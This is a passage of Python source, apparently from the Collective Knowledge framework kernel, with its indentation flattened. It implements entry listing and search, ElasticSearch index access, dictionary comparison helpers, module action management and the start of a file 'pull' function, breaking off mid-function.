dpcfg=os.path.join(dp,cfg['subdir_ck_ext'])
dpinfo=os.path.join(dp,cfg['subdir_ck_ext'],cfg['file_info'])
dpmeta=os.path.join(dp,cfg['subdir_ck_ext'],cfg['file_meta'])
tduid=r['data_uid']
tduoa=r['data_uoa']
if os.path.isdir(dpcfg): # Check if really CK data entry
dskip=False
if wd!='':
if len(lduoa)>0 and (tduoa not in lduoa and tduid not in lduoa):
dskip=True
elif wd=='*':
pass
# elif is_uid(tduoa):
# dskip=True # If have wildcards, but not alias
elif not fnmatch.fnmatch(tduoa, wd):
dskip=True
if not dskip:
# Iterate over data
ll={'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':tduoa, 'data_uid':tduid,
'path':dp}
# Need to load info?
if iaf or iprn:
if os.path.isfile(dpinfo):
y=load_json_file({'json_file':dpinfo})
if y['return']>0:
if not debug: continue
return y
ll['info']=y['dict']
# Need to load meta?
if iam:
if os.path.isfile(dpmeta):
y=load_json_file({'json_file':dpmeta})
if y['return']>0:
if not debug: continue
return y
ll['meta']=y['dict']
# Call filter
fskip=False
if ff!=None and ff!='':
ll['out']=o
ll['search_dict']=sd
ll['search_string']=ss
ll['ignore_case']=ic
ll['ignore_update']=iu
if oaidb!=None: ll['obj_date_before']=oaidb
if oaida!=None: ll['obj_date_after']=oaida
if oaid!=None: ll['obj_date']=oaid
if sn!=None: ll['search_by_name']=sn
rx=ff(ll)
if rx['return']>0:
if not debug: continue
return rx
if rx.get('skip','')=='yes':
fskip=True
# Append
if not fskip:
ils+=1
if not idnatl:
lst.append(ll)
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"list", "repo_uoa":"'+
ll.get('repo_uoa','')+'", "repo_uid":"'+
ll.get('repo_uid','')+'", "module_uoa":"'+
ll.get('module_uoa','')+'", "module_uid":"'+
ll.get('module_uid','')+'", "data_uoa":"'+
ll.get('data_uoa','')+'", "data_uid":"'+
ll.get('data_uid','')+'"\n',
'append':'yes'})
if rl['return']>0: return rl
if o=='con':
x=''
if iprf: x=ruoa+':'+muoa+':'
if sys.version_info[0]<3:
y=tduoa
try: y=y.decode(sys.stdin.encoding)
except Exception as e:
try: y=y.decode('utf8')
except Exception as e: pass
x+=y
else: x+=tduoa
if ipru: x+=' ('+tduid+')'
if iprn:
name=ll.get('info',{}).get('data_name','')
if name!='':
x=name+' ('+x+')'
out(x)
# Check timeout
elapsed_time = time.time() - start_time
if to!=-1 and elapsed_time>to:
finish=True
break
# Check size
if ls>0 and ils==ls:
finish=True
break
if finish: break
if finish: break
# Finish iteration over repositories
ir+=1
if o=='con' and i.get('print_time','')=='yes':
out('Elapsed time: '+str(elapsed_time)+' sec., number of entries: '+str(ils))
rr={'return':0, 'lst':lst, 'elapsed_time':str(elapsed_time)}
if finish: rr['timed_out']='yes'
return rr
##############################################################################
# List data with search
def list_data2(i):
o=i.get('out','')
rr=list_data(i)
lst=rr['lst']
if len(lst)==0 and cfg.get('download_missing_components','')=='yes':
# Search on cKnowledge.org
import copy
oo=''
if o=='con': oo=o
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# out('')
# out(' WARNING: checking missing components "'+muoa+':'+duoa+'" at the CK portal ...')
# Try to download missing action/module
ry=download({'module_uoa':muoa,
'data_uoa':duoa,
'out':'con'})
if ry['return']>0: return ry
# Restart local search
rr=list_data(i)
return rr
##############################################################################
# Common action: search entries
#
# TARGET: CK kernel and low-level developers
def search(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module UOA
(data_uoa) - data UOA
(repo_uoa_list) - list of repos to search
(module_uoa_list) - list of module to search
(data_uoa_list) - list of data to search
(add_if_date_before) - add only entries with date before this date
(add_if_date_after) - add only entries with date after this date
(add_if_date) - add only entries with this date
(search_by_name) - search by name
(print_time) - if 'yes', print elapsed time at the end
(search_flat_dict) - search if these flat keys/values exist in entries
(search_dict) - search if this dict is a part of the entry
(tags) - add tags to search in format tags=x,y,z
or
(search_string) - search with expressions *?
(ignore_case) - if 'yes', ignore case of letters
(time_out) - in secs, default=30
(internal) - if 'yes', use internal search even if indexing is on
(limit_size) - by default 5000 or -1 if no limit
(start_from) - start from a specific entry (only for ElasticSearch)
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
(print_uid) - if 'yes', print UID in brackets
(print_name) - if 'yes', print name (and add info to the list)
(add_info) - if 'yes', add info about entry to the list
(add_meta) - if 'yes', add meta about entry to the list
(debug) - if 'yes', print debug info
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path'}]
elapsed_time - elapsed time in string
(timed_out) - if 'yes', timed out
}
"""
o=i.get('out','')
rr=search2(i)
if rr['return']>0: return rr
lst=rr['lst']
if len(lst)==0 and cfg.get('download_missing_components','')=='yes':
# Search on cKnowledge.org
import copy
oo=''
if o=='con': oo=o
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# out('')
# out(' WARNING: checking missing components "'+muoa+':'+duoa+'" at the CK portal ...')
ry=download({'module_uoa':muoa,
'data_uoa':duoa,
'out':'con'})
if ry['return']>0: return ry
# Restart local search
rr=search2(i)
return rr
##############################################################################
# Original search
def search2(i):
o=i.get('out','')
ss=i.get('search_string','')
sd=i.get('search_dict',{})
ls=i.get('limit_size','5000')
rr={'return':0}
# Check tags
tags=i.get('tags','')
if tags!='':
xtags=tags.split(',')
xtags1=[]
for q in xtags:
xtags1.append(q.strip())
sd['tags']=xtags1
# Check if index
if i.get('internal','')=='yes' or cfg.get('use_indexing','')!='yes' or (i.get('module_uoa','')!='' and not index_module(i['module_uoa'],i.get('repo_uoa',''))):
if ss!='':
i['filter_func']='search_string_filter'
else:
sfd=i.get('search_flat_dict',{})
if len(sfd)>0:
r=restore_flattened_dict({'dict':sfd})
if r['return']>0: return r
nd=r['dict']
sd.update(nd)
del (i['search_flat_dict'])
i['filter_func']='search_filter'
i['search_dict']=sd
pf=i.get('print_full','')
if pf=='': pf='yes'
i['print_full']=pf
rr=list_data(i)
else:
import time
start_time = time.time()
b_add_meta=(i.get('add_meta','')=='yes')
b_add_info=(i.get('add_info','')=='yes')
# Check if using ElasticSearch via Python client
eec=False
if cfg.get('index_use_curl','')=='yes' or cfg.get('index_use_web','')=='yes':
eec=True
dss={} # Used with python ElasticSearch client
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
lruoa=i.get('repo_uoa_list',[])
lmuoa=i.get('module_uoa_list',[])
lduoa=i.get('data_uoa_list',[])
if ruoa!='': lruoa.append(ruoa)
if muoa!='': lmuoa.append(muoa)
if duoa!='': lduoa.append(duoa)
if len(lruoa)>0:
if ss!='': ss+=' AND '
ss+=' ('
first=True
for x in lruoa:
if first: first=False
else: ss+=' OR '
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+='(repo_uid:'+xx1+x+xx1+') OR (repo_uoa:'+xx1+x+xx1+')'
ss+=')'
if len(lmuoa)>0:
if ss!='': ss+=' AND '
ss+='('
first=True
for x in lmuoa:
if first: first=False
else: ss+=' OR '
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+='(module_uid:'+xx1+x+xx1+') OR (module_uoa:'+xx1+x+xx1+')'
ss+=')'
if len(lduoa)>0:
if ss!='': ss+=' AND '
ss+='('
first=True
for x in lduoa:
if first: first=False
else: ss+=' OR '
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+='(data_uid:'+xx1+x+xx1+') OR (data_uoa:'+xx1+x+xx1+')'
ss+=')'
# Check search keys
first=True
for u in sd:
v=sd[u]
if first:
first=False
if ss=='': ss+='('
else: ss+=' AND ('
else:
ss+=' AND '
if type(v)==list:
first1=True
for lk in v:
if first1:
first1=False
else:
ss+=' AND '
x=str(lk)
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+=u+':'+xx1+x+xx1
else:
x=str(v)
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+=u+':'+xx1+x+xx1
# Check special parameters
aidb=i.get('add_if_date_before','')
aida=i.get('add_if_date_after','')
aid=i.get('add_if_date','')
# Support ISO and human readable time
aidb=aidb.strip().replace(' ','T')
aida=aida.strip().replace(' ','T')
aid=aid.strip().replace(' ','T')
sn=i.get('search_by_name','')
if sn!='':
if first:
first=False
if ss=='': ss+='('
else: ss+=' AND ('
else:
ss+=' AND '
xx1='"'
if sn.find('*')>=0 or sn.find('?')>=0:
xx1=''
ss+='data_name:'+xx1+sn+xx1
if aidb!='' or aida!='' or aid!='':
if first:
first=False
if ss=='': ss+='('
else: ss+=' AND ('
else:
ss+=' AND '
ss+='iso_datetime:'
if aid!='':
ss+='"'+aid+'"'
else:
ss+='['
if aida!='':
ss+='"'+aida+'"'
else:
ss+='*'
if aidb!='':
ss+=' TO "'+aidb+'"'
ss+='] '
# Finish query
if not first:
ss+=')'
# Prepare ElasticSearch query
try:
import urllib.parse as ur
except Exception as e:
import urllib as ur
path='/_search?'
if ss!='': path+='q='+ur.quote_plus(ss.encode('utf-8'))
if ls!='': path+='&size='+ls
# dss={'query':{'filtered':{'filter':{'terms':sd}}}}
dss={}
if i.get('debug','')=='yes':
out('Query string: '+ss)
out('')
ri=access_index_server({'request':'GET',
'path':path,
'dict':dss,
'original_string':ss,
'limit_size':ls,
'start_from':i.get('start_from','')})
if ri['return']>0: return ri
dd=ri['dict'].get('hits',{}).get('hits',[])
lst=[]
for qx in dd:
q=qx.get('_source',{})
ruoa=q.get('repo_uoa','')
ruid=q.get('repo_uid','')
muoa=q.get('module_uoa','')
muid=q.get('module_uid','')
duoa=q.get('data_uoa','')
duid=q.get('data_uid','')
path=q.get('path','')
to_add={'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid':duid,
'path':path}
if b_add_meta: to_add['meta']=q.get('dict')
if b_add_info: to_add['info']=q.get('dict')
lst.append(to_add)
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"find", "repo_uoa":"'+
ruoa+'", "repo_uid":"'+
ruid+'", "module_uoa":"'+
muoa+'", "module_uid":"'+
muid+'", "data_uoa":"'+
duoa+'", "data_uid":"'+
duid+'"\n',
'append':'yes'})
if rl['return']>0: return rl
if o=='con':
x=ruoa+':'+muoa+':'
if sys.version_info[0]<3:
y=duoa
try: y=y.decode(sys.stdin.encoding)
except Exception as e:
try: y=y.decode('utf8')
except Exception as e: pass
x+=y
else: x+=duoa
out(x)
rr['lst']=lst
rr['elapsed_time']=str(time.time() - start_time)
if o=='con' and i.get('print_time','')=='yes':
out('Elapsed time: '+rr['elapsed_time']+' sec., number of entries: '+str(len(lst)))
return rr
##############################################################################
# Search filter
#
# TARGET: CK kernel and low-level developers
def search_filter(i):
"""
Input: {
repo_uoa - repo UOA
module_uoa - module UOA
data_uoa - data UOA
path - path
(search_dict) - search if this dict is a part of the entry
(ignore_case) - if 'yes', ignore case of letters
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path'}]
}
"""
ic=i.get('ignore_case','')
# Check special info
info=i.get('info',{})
if len(info)!='':
oaidb=i.get('obj_date_before', None)
oaida=i.get('obj_date_after', None)
oaid=i.get('obj_date', None)
sn=i.get('search_by_name','')
# Check dates
if oaidb!=None or oaida!=None or oaid!=None:
idt=info.get('control',{}).get('iso_datetime','')
if idt!='':
rx=convert_iso_time({'iso_datetime':idt})
if rx['return']>0: return rx
oidt=rx['datetime_obj']
if oaidb!=None and oidt>oaidb: return {'return':0, 'skip':'yes'}
if oaida!=None and oidt<oaida: return {'return':0, 'skip':'yes'}
if oaid!=None and oidt!=oaid: return {'return':0, 'skip':'yes'}
# Check if search by name
if sn!='':
ro=find_string_in_dict_or_list({'dict':{'string':info.get('data_name','')},
'search_string':sn,
'ignore_case':ic})
if ro['return']>0: return ro
if ro['found']!='yes': return {'return':0, 'skip':'yes'}
# To be fast, load directly
p=i['path']
skip='yes'
sd=i.get('search_dict',{})
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta'])
if not os.path.isfile(p1):
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta_old'])
if not os.path.isfile(p1):
return {'return':0, 'skip':'yes'}
r=load_json_file({'json_file':p1})
if r['return']>0: return r
d=r['dict']
# Check directly
rx=compare_dicts({'dict1':d, 'dict2':sd, 'ignore_case':ic})
if rx['return']>0: return rx
equal=rx['equal']
if equal=='yes': skip='no'
return {'return':0, 'skip':skip}
##############################################################################
# Compare 2 dictionaries (recursively)
#
# TARGET: end users
def compare_dicts(i):
"""
Input: {
dict1 - dictionary 1
dict2 - dictionary 2
(ignore_case) - ignore case of letters
Note that if dict1 and dict2 has lists, the results will be as follows:
* dict1={"key":['a','b','c']}
dict2={"key":['a','b']}
EQUAL
* dict1={"key":['a','b']}
dict2={"key":['a','b','c']}
NOT EQUAL
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
equal - if 'yes' dictionaries are equal
}
"""
d1=i.get('dict1',{})
d2=i.get('dict2',{})
equal='yes'
bic=False
ic=i.get('ignore_case','')
if ic=='yes': bic=True
for q2 in d2:
v2=d2[q2]
if type(v2)==dict:
if q2 not in d1:
equal='no'
break
v1=d1[q2]
rx=compare_dicts({'dict1':v1,'dict2':v2, 'ignore_case':ic})
if rx['return']>0: return rx
equal=rx['equal']
if equal=='no':
break
elif type(v2)==list:
# For now can check only values in list
if q2 not in d1:
equal='no'
break
v1=d1[q2]
if type(v1)!=list:
equal='no'
break
for m in v2:
if m not in v1:
equal='no'
break
if equal=='no':
break
else:
if q2 not in d1:
equal='no'
break
if equal=='no':
break
v1=d1[q2]
if bic and type(v1)!=int and type(v1)!=float and type(v1)!=bool:
v1=v1.lower()
v2=v2.lower()
if v2!=v1:
equal='no'
break
return {'return':0, 'equal':equal}
##############################################################################
# Compare two flat dictionaries
#
# TARGET: end users
def compare_flat_dicts(i):
"""
Input: {
dict1 - dictionary 1
dict2 - dictionary 2
(ignore_case) - ignore case of letters
(space_as_none) - if 'yes', consider "" as None
(keys_to_ignore) - list of keys to ignore (can be wildcards)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
equal - if 'yes' dictionaries are equal
}
"""
d1=i.get('dict1',{})
d2=i.get('dict2',{})
equal='yes'
ic=False
x=i.get('ignore_case','')
if x=='yes': ic=True
san=None
x=i.get('space_as_none','')
if x=='yes': san=''
# Create common set of keys
keys=list(d1.keys())
for q in d2:
if q not in keys:
keys.append(q)
# If keys to ignore
kti=i.get('keys_to_ignore',[])
if len(kti)>0:
import fnmatch
x=[]
for q in keys:
skip=False
for k in kti:
if fnmatch.fnmatch(q,k):
skip=True
if not skip:
x.append(q)
keys=x
# Compare all keys
for q in keys:
v1=d1.get(q, san)
v2=d2.get(q, san)
if ic and type(v1)!=int and type(v1)!=float and type(v1)!=bool:
v1=v1.lower()
v2=v2.lower()
if v1!=v2:
equal='no'
break
return {'return':0, 'equal':equal}
##############################################################################
# Find string in dict
#
# TARGET: end users
def find_string_in_dict_or_list(i):
"""
Input: {
dict - dictionary 1
(search_string) - search string
(ignore_case) - ignore case of letters
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
found - if 'yes', string found
}
"""
d=i.get('dict',{})
found='no'
wc=False
ss=i.get('search_string','')
if ss.find('*')>=0 or ss.find('?')>=0:
wc=True
import fnmatch
bic=False
ic=i.get('ignore_case','')
if ic=='yes':
bic=True
ss=ss.lower()
for q in d:
if type(d)==dict: v=d[q]
elif type(d)==list: v=q
else: v=str(q)
if type(v)==dict or type(v)==list:
rx=find_string_in_dict_or_list({'dict':v, 'search_string':ss, 'ignore_case':ic})
if rx['return']>0: return rx
found=rx['found']
if found=='yes':
break
else:
try: v=str(v)
except Exception as e: pass
if bic:
v=v.lower()
if (wc and fnmatch.fnmatch(v, ss)) or v==ss:
found='yes'
break
return {'return':0, 'found':found}
##############################################################################
# Search filter
#
# TARGET: CK kernel and low-level developers
def search_string_filter(i):
"""
Input: {
repo_uoa - repo UOA
module_uoa - module UOA
data_uoa - data UOA
path - path
(search_string) - search with expressions *?
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path'}]
}
"""
# To be fast, load directly
p=i['path']
skip='yes'
ss=i.get('search_string','')
if ss=='':
skip='no'
else:
ic=i.get('ignore_case','')
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta'])
if not os.path.isfile(p1):
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta_old'])
if not os.path.isfile(p1):
return {'return':0, 'skip':'yes'}
r=load_json_file({'json_file':p1})
if r['return']>0: return r
d=r['dict']
# Check directly
rx=find_string_in_dict_or_list({'dict':d, 'search_string':ss, 'ignore_case':ic})
if rx['return']>0: return rx
found=rx['found']
if found=='yes': skip='no'
return {'return':0, 'skip':skip}
##############################################################################
# Access index server
#
# TARGET: CK kernel and low-level developers
def access_index_server(i):
"""
Input: {
request - request type ('PUT' | 'DELETE' | 'TEST' | 'GET')
(path) - path
(dict) - query as dict to send
(limit_size) - limit queries with this number (if 'GET')
(start_from) - start from a given entry in a query
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - returned dict
}
"""
request=i['request']
# Prepare URL
host=cfg.get('index_host','')
if host=='':
return {'return':1, 'error':'index host is not defined in configuration'}
url=host
port=cfg.get('index_port','')
if port!='':
url+=':'+port
path=i.get('path','')
xpath=path.split('/')
dd=i.get('dict',{})
ddo={}
if cfg.get('index_use_curl','')=='yes':
url+=path
import tempfile
fd1, fn1=tempfile.mkstemp(suffix='.tmp', prefix='ck-')
os.close(fd1)
os.remove(fn1)
fd2, fn2=tempfile.mkstemp(suffix='.tmp', prefix='ck-')
os.close(fd2)
os.remove(fn2)
r=save_json_to_file({'json_file':fn1, 'dict':dd})
if r['return']>0: return r
cmd='curl -X'+request+' '+url+' -d @'+fn1+' -s -o '+fn2
os.system(cmd)
# Read output
if not os.path.isfile(fn2):
return {'return':1, 'error':'problem accessing indexing server - maybe indexing server is down?'}
r=load_json_file({'json_file':fn2})
if os.path.isfile(fn1): os.remove(fn1)
if os.path.isfile(fn2): os.remove(fn2)
if r['return']>0: return r
ddo=r['dict']
elif cfg.get('index_use_web','')=='yes':
url+=path
try:
import urllib.request as urllib2
except:
import urllib2
try:
from urllib.parse import urlencode
except:
from urllib import urlencode
# Prepare post variables
r=dumps_json({'dict':dd, 'skip_indent':'yes'})
if r['return']>0: return r
s=r['string'].encode('utf8')
rq = urllib2.Request(url, s)
if request=='DELETE':
rq.get_method = lambda: request
not_found=False
try:
f=urllib2.urlopen(rq)
except urllib2.URLError as e:
se=format(e)
if request=='DELETE' and se.find('404')>0:
not_found=True
else:
return {'return':1, 'error':'problem accessing indexing server ('+se+')'}
if not not_found:
try:
s=f.read()
f.close()
except Exception as e:
return {'return':1, 'error':'can\'t parse output during indexing ('+format(e)+')'}
if sys.version_info[0]>2:
s=s.decode('utf8')
r=convert_json_str_to_dict({'str':s, 'skip_quote_replacement':'yes'})
if r['return']>0:
return {'return':1, 'error':'can\'t parse output from index server ('+r['error']+')'}
ddo=r['dict']
else:
# Check that elastic search client is installed
found_elasticsearch=True
try:
import elasticsearch
except Exception as e:
found_elasticsearch=False
pass
if not found_elasticsearch:
return {'return':1, 'error':'Python elasticsearch client library was not found; try to install it via "pip install elasticsearch"'}
# Init ElasticSearch
try:
es=elasticsearch.Elasticsearch([url])
except elasticsearch.ElasticsearchException as e:
return {'return':1, 'error':'problem initializing ElasticSearch ('+format(e)+')'}
es_index='ck'
es_doc_type='_doc'
# Check commands
if request=='TEST':
# Normally we already connected fine above
ddo=es.info()
ddo['health']=es.cluster.health()
ddo['status']=200
else:
es_id=''
if len(xpath)>1:
es_id+=xpath[1]
if len(xpath)>2:
es_id+='_'+xpath[2]
if request=='GET':
lsize=i.get('limit_size','')
if lsize!='' and lsize!=None:
lsize=int(lsize)
else:
lsize=1000
start_from=i.get('start_from','')
if start_from!='' and start_from!=None:
start_from=int(start_from)
else:
start_from=0
s=i.get('original_string','')
try:
ddo = es.search(index="ck",
body={"query": {
"query_string":{
"query":s,
"analyze_wildcard":True
}
},
"from":start_from,
"size":lsize})
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':33, 'error':'problem 33 accessing indexing server ('+se+')'}
elif request=='DELETE':
if path=='/_all':
try:
ddo=es.indices.delete(index=es_index, ignore=[400, 404])
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':2, 'error':'problem 2 accessing indexing server ('+se+')'}
else:
exists=True
try:
ddo=es.get(index=es_index, doc_type=es_doc_type, id=es_id)
except elasticsearch.ElasticsearchException as e:
es_status=e.info.get('status',0)
if es_status==404 or e.info.get('found')==False:
exists=False
if exists:
try:
ddo=es.delete(index=es_index, doc_type=es_doc_type, id=es_id)
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':3, 'error':'problem 3 accessing indexing server ('+se+')'}
elif request=='PUT':
try:
ddo=es.index(index=es_index, doc_type=es_doc_type, id=es_id, body=dd)
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':4, 'error':'problem 4 accessing indexing server ('+se+')'}
return {'return':0, 'dict':ddo}
##############################################################################
# Add action to a module
#
# TARGET: CK kernel and low-level developers
def add_action(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - normally should be 'module' already
data_uoa - UOA of the module to be created
func - action
(desc) - desc
(for_web) - if 'yes', make it a web API, i.e. allow an access to this function in the CK server
(skip_appending_dummy_code) - if 'yes', do not append code
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'update' function
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
func=i.get('func','')
desc=i.get('desc','')
fweb=i.get('for_web','')
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa!='':
muoa=duoa
duoa=''
# Find path to module
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
pp=r['path']
dd=r['dict']
actions=dd.get('actions',{})
actions_redirect=dd.get('actions_redirect',{})
# Check func and desc
if o=='con':
if func=='':
r=inp({'text':'Add action function (or Enter to stop): '})
func=r['string']
if func!='':
# if fweb=='':
# r1=inp({'text':'Support web (y/N): '})
# fweb=r1['string'].lower()
# if fweb=='y' or fweb=='yes': fweb='yes'
# else: fweb=''
if desc=='':
r1=inp({'text':'Add action description: '})
desc=r1['string']
# Check if empty
if func=='':
return {'return':1, 'error':'action (function) is not defined'}
if len(func)>0 and func[0].isdigit():
return {'return':1, 'error':'action name should not start from a number'}
if cfg.get('allowed_action_names','')!='':
import re
anames=cfg.get('allowed_action_names','')
if not re.match(anames, func):
return {'return':1, 'error':'found disallowed characters in the action name (allowed: "'+anames+'")'}
if func in actions:
return {'return':1, 'error':'action (function) already exists in the module'}
if '-' in func:
func1=func.replace('-','_')
actions_redirect[func]=func1
# Adding actions
actions[func]={}
if desc!='': actions[func]['desc']=desc
if fweb!='': actions[func]['for_web']=fweb
dd['actions']=actions
dd['actions_redirect']=actions_redirect
if i.get('skip_appending_dummy_code','')!='yes':
ii={'module_uoa':cfg['module_name'],
'data_uoa':cfg['module_name']}
r=load(ii)
if r['return']>0: return r
px=r['path']
pd=r['dict']
pma=os.path.join(px, pd['dummy_module_action'])
# Load module action dummy
r=load_text_file({'text_file':pma})
if r['return']>0: return r
spma=r['string']
# Load current module
pmx=os.path.join(pp, cfg['module_full_code_name'])
r=load_text_file({'text_file':pmx})
if r['return']>0: return r
spm=r['string']
# Update
if func in actions_redirect:
func=actions_redirect[func]
spm+='\n'+spma.replace('$#action#$', func).replace('$#desc#$',desc)
# Write current module
rx=save_text_file({'text_file':pmx, 'string':spm})
if rx['return']>0: return rx
# Update data entry
if o=='con': out('')
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa,
'dict':dd,
'out':o,
'sort_keys':'yes'}
if ruoa!='': ii['repo_uoa']=ruoa
r=update(ii)
if r['return']>0: return r
return r
##############################################################################
# Remove action from a module
#
# TARGET: CK kernel and low-level developers
def remove_action(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - normally should be 'module' already
data_uoa - UOA of the module to be created
func - action
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'update' function
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
func=i.get('func','')
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa!='':
muoa=duoa
duoa=''
# Find path to module
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
pp=r['path']
dd=r['dict']
actions=dd.get('actions',{})
# Check func and desc
if o=='con':
if func=='':
r=inp({'text':'Enter function to be removed (or Enter to quit) - note that we remove only reference to this function from the module meta: '})
func=r['string']
# Check if empty
if func=='':
return {'return':1, 'error':'action (function) is not defined'}
if func not in actions:
return {'return':1, 'error':'action (function) is not found in the module'}
del (actions[func])
dd['actions']=actions
# Update data entry
if o=='con': out('')
ii={'module_uoa':cfg['module_name'],
'data_uoa':muoa,
'dict':dd,
'substitute':'yes',
'sort_keys':'yes',
'out':o}
if ruoa!='': ii['repo_uoa']=ruoa
r=update(ii)
if r['return']>0: return r
if o=='con':
out('')
out('Reference to the function "'+func+'" was removed from module meta. Function body was not removed from the python code')
return r
##############################################################################
# List actions in a module
#
# TARGET: CK kernel and low-level developers
def list_actions(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module_uoa, if =="", use kernel
(data_uoa)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
actions - list of actions
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa!='':
if duoa!='':
muoa=duoa
duoa=''
# Find path to module 'module' to get dummies
ii={'action':'load',
'module_uoa':cfg['module_name'],
'data_uoa':muoa,
'common_func':'yes'}
if ruoa!='': ii['repo_uoa']=ruoa
r=access(ii)
if r['return']>0: return r
dd=r['dict']
actions=dd.get('actions',{})
else:
actions=cfg['actions']
# If console, print actions
if o=='con':
for q in sorted(actions.keys()):
s=q
desc=actions[q].get('desc','')
if desc!='': s+=' - '+desc
out(s)
return {'return':0, 'actions':actions}
##############################################################################
# Pull data
#
# TARGET: CK kernel and low-level developers
def pull(i):
"""
Input: {
(repo_uoa) - repo UOA, if needed
module_uoa - module UOA
data_uoa - data UOA
(filename) - filename (with path) (if empty, set archive to 'yes')
or
(cid[0])
if empty, create an archive of the entry
(archive) - if 'yes' pull whole entry as zip archive using filename or ck_archive.zip
(all) - if 'yes' and archive, add even special directories (.cm, .svn, .git, etc)
(out) - if 'json' or 'json_file', encode file and return in r
(skip_writing) - if 'yes', do not write file (not archive) to current directory
(pattern) - return only files with this pattern
(patterns) - multiple patterns (useful to pack mutiple points in experiments)
(encode_file) - if 'yes', encode file
(skip_tmp) - if 'yes', skip tmp files and directories
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
(file_content_base64) - if i['to_json']=='yes', encoded file
(filename) - filename to record locally
}
"""
o=i.get('out','')
tj=False
if o=='json' or o=='json_file' or i.get('encode_file','')=='yes':
tj=True
st=i.get('skip_tmp','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
pat=i.get('pattern','')
pats=i.get('patterns',[])
if pat!='':
pats.append(pat)
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
# Attempt to load data (to find path, etc)
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
muoa=r['module_uoa']
duoa=r['data_uoa']
dd=r['dict']
# How output
sw=i.get('skip_writing','')
# Prepare output
rr={'return':0}
# Check what to pull
pfn=''
if fn=='':
i['archive']='yes'
delete_file=''
if i.get('archive','')!='yes':
# Get file
pfn=os.path.normpath(os.path.join(p,fn))
# Check that file is not getting outside paths ...
if not pfn.startswith(p):
return {'return':1, 'error':'path of file is outside entry'}
if not os.path.isfile(pfn):
return {'return':1, 'error':'file not found'}
if not tj and sw!='yes':
# Copy file to current directory
if os.path.isfile(fn):
return {'return':1, 'error':'file already exists in the current directory'}
# Copy file
import shutil
shutil.copyfile(pfn,fn)
py=os.path.split(fn)
rr['filename']=py[1]
else:
# Prepare archive name
if fn!='':
# Check that file is not getting outside paths ...
fn=os.path.normpath(os.path.join(os.getcwd(),fn))
if not pfn.startswith(os.getcwd()):
return {'return':1, 'error':'archive filename should not have path'}
else:
if tj:
# Generate tmp file
import tempfile
fd, fn=tempfile.mkstemp(suffix='.tmp', prefix='ck-') # suffix is important - CK will delete such file!
os.close(fd)
os.remove(fn)
delete_file=fn
else:
fn=cfg['default_archive_name']
pfn=fn
